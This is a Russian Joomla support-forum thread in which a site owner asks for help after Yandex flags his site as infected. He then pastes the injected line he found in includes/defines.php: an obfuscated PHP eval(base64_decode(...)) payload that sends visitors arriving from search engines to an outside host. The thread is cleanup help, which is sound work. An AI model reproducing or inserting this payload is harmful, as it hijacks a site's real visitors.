0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 813 Просмотров
*

Гена

  • Новичок
  • 13
  • 0 / 0
Давно не производились работы над сайтом и тут yandex сказал что у меня вирус "поведенческий анализ"
И отобразил зараженные страницы:
   
http://www.rim-law.ru/   
http://www.rim-law.ru/services/individuals/sud/itemlist/user/63-2013-05-12-03-34-21.html?start=10   
http://www.rim-law.ru/services/mezdunarodnie-svizi/2011-04-07-16-09-31/itemlist/user/63-2014-05-14-15-09-59.html?start=20   
http://www.rim-law.ru/services/real-estate/privatizasia.html      
http://www.rim-law.ru/services/real-estate/privatizasia/itemlist/user/63-2014-04-15-07-53-14.html   
http://www.rim-law.ru/services/real-estate/soglosovanie-pereplanirovok/itemlist/user/62-administrator.html?start=30

Я уже удалил все что можно и нельзя но не чего не помогает. Подскажите хоть куда копать. Ранее когда yandex находил вирус там было все понятно. Ссылки на сторонние сайты ... Но тут я не чего не могу найти.
*

draff

  • Живу я здесь
  • 3793
  • 248 / 6
  • Ищу работу
Re: Вирус. Поведенчиский анализ
« Ответ #1 : 26.06.2014, 18:33:43 »
Проверь файл /includes/defines.php ищи файлы a.php and movie.php
http://joomlaforum.ru/index.php/topic,246899.msg1470538.html#quickreply
« Последнее редактирование: 26.06.2014, 18:45:19 от draff »
*

ELLE

  • Глобальный модератор
  • 4512
  • 883 / 0
Re: Вирус. Поведенчиский анализ
« Ответ #2 : 26.06.2014, 18:38:58 »
да не обязательно там, пихают и в components/ и глубже
вчера только выгребала это
*

Гена

  • Новичок
  • 13
  • 0 / 0
Re: Вирус. Поведенчиский анализ
« Ответ #3 : 26.06.2014, 18:44:27 »
Проверь файл /includes/defines.php ищи файлы a.php and movie.php
Проверь файл /includes/defines.php ищи файлы a.php and movie.php

Прямо в этом файле в верхней строчки нашел:
<?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYWxmc3lzdGVtLmNvbS5teS9pbmNsdWRlcy9kb21pdC8xLnBocCIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="))

Этого на сколько я понимаю точно быть не должно. Буду пытаться найти еще. Спасибо 
*

Гена

  • Новичок
  • 13
  • 0 / 0
Re: Вирус. Поведенчиский анализ
« Ответ #4 : 26.06.2014, 18:52:50 »
Проверь файл /includes/defines.php ищи файлы a.php and movie.php
http://joomlaforum.ru/index.php/topic,246899.msg1470538.html#quickreply
Более того я на той недели данные файлы удалял: a.php and movie.php
*

Гена

  • Новичок
  • 13
  • 0 / 0
Re: Вирус. Поведенчиский анализ
« Ответ #5 : 26.06.2014, 18:53:45 »
да не обязательно там, пихают и в components/ и глубже
вчера только выгребала это
a.php and movie.php они лежали именно в этой папке. Как бы только на будущие обезопасить себя.
*

ELLE

  • Глобальный модератор
  • 4512
  • 883 / 0
*

Гена

  • Новичок
  • 13
  • 0 / 0
Re: Вирус. Поведенчиский анализ
« Ответ #7 : 26.06.2014, 19:09:35 »
в com_contact еще посмотрите..
Спасибо за совет. Там все нормально
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус как удалить

Автор Akksimo

Ответов: 3
Просмотров: 749
Последний ответ 30.07.2014, 12:50:02
от wishlight
Вирус на сайте ?

Автор Atalla

Ответов: 12
Просмотров: 589
Последний ответ 29.03.2014, 22:02:39
от Atalla
Вирус на Joomla 1.5

Автор nurlan87w

Ответов: 5
Просмотров: 1000
Последний ответ 08.09.2013, 20:25:22
от altvvc
вирус на сайте

Автор Girevik

Ответов: 10
Просмотров: 1199
Последний ответ 30.06.2013, 21:31:10
от Girevik
Вирус на сайте Joomla во всех php файлах.

Автор art-m1987

Ответов: 20
Просмотров: 10234
Последний ответ 06.06.2013, 09:04:11
от LyalyaChornaya